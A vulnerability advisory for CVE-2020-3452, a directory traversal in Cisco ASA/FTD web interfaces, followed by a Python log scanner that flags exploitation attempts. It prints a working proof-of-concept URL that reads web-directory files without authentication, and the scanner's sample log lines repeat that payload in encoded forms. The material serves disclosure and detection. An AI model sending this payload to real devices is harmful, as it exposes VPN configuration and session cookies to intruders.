Cisco ASA Devices Arbitrary File Reading Vulnerability CVE-2020-3452
Vulnerability Description
The web management interface of Cisco Adaptive Security Appliance (ASA) firewall devices and Cisco Firepower Threat Defense (FTD) devices contains an unauthenticated directory traversal vulnerability that allows a remote attacker to read sensitive files on the target system. The vulnerability cannot be used to obtain access to ASA or FTD system files or to underlying operating system (OS) files; it can only read files in the web system directories, such as WebVPN configuration files, bookmarks, web cookies, some web content and HTTP URLs.
Affected Versions
Cisco ASA device
Cisco FTD device
Network mapping fingerprints
/+CSCOE+/
Cisco-ASA
Vulnerability Reproduction
Verification PoC
https://xxx.xxx.xxx.xxx/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
The requested file is returned as a download.
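For detection, the request shape of the PoC above can be matched in web access logs. The following is an added example, not part of the original page or of any Cisco tooling: it assumes combined-format access logs (for example from a proxy in front of the device), the function names are hypothetical, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, unquote

# Endpoint named in the PoC on this page (compared case-insensitively).
ENDPOINT = "/+cscot+/translation-table"
# Request field of a combined-format log line: "METHOD URI PROTOCOL" (assumed layout).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal_probe(uri):
    """True if the URI matches the CVE-2020-3452 request shape shown above."""
    parts = urlsplit(uri)
    if fully_unquote(parts.path).lower() != ENDPOINT:
        return False
    params = {}
    for pair in parts.query.split("&"):
        key, _, val = pair.partition("=")
        # unquote() rather than parse_qs(): a literal '+' must not become a space.
        params[fully_unquote(key).lower()] = fully_unquote(val)
    # Assumption: legitimate values are a language code and a plain text-domain
    # name, so dot-dot in lang or a path separator in textdomain is suspicious.
    if ".." in params.get("lang", ""):
        return True
    return any(sep in params.get("textdomain", "") for sep in "/\\")

def scan(log_lines):
    """Return (client_ip, uri) for every log line that matches."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and is_traversal_probe(m.group(1)):
            hits.append((line.split()[0], m.group(1)))
    return hits

# Constructed sample lines (documentation addresses), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Aug/2020:10:00:01 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 4512',
    '192.0.2.10 - - [01/Aug/2020:10:00:05 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=webvpn&lang=en HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Aug/2020:10:00:09 +0000] "GET /%2bCSCOT%2b/translation-table?textdomain=x&lang=%252e%252e%252f HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Aug/2020:10:00:12 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 3021',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A match only shows that the request was made; whether a file was actually returned depends on the device's software version and on the response recorded for that request.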